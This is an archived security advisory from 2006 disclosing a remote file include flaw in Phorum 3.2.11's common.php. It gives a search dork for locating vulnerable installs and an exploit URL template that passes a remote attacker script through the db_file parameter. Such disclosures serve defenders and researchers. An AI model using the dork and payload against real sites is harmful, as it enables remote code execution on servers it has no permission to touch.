Computer Security

Security Advisory: Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  BTSaveMySql 1.2 (acces to config files)

  cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability

  EasyPage Portal ( all ver )SQL Injection

From:Mr-m07 <xp10_(at)_hotmail.com>
Date:06.12.2006
Subject:Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability

===========================================================
Yee7TeaM

WwW.Yee7.CoM
===========================================================

Software: Phorum v3.2.11

Vendor: http://www.phorum.org/

Download: http://skrypty.webpc.pl/pobierz274.html

Dork: "Copyright (C) 2000  Phorum Development Team"  and back form doc
folder :)

Description:

Line 31 of common.php

>
>>  // $db_file = './db/postgresql65.php';
>

Exploit: http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]


===========================================================
By: Mr-m07
Thanx To: ShockShadow & AL-SHIKH
WwW.Yee7.CoM
===========================================================

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru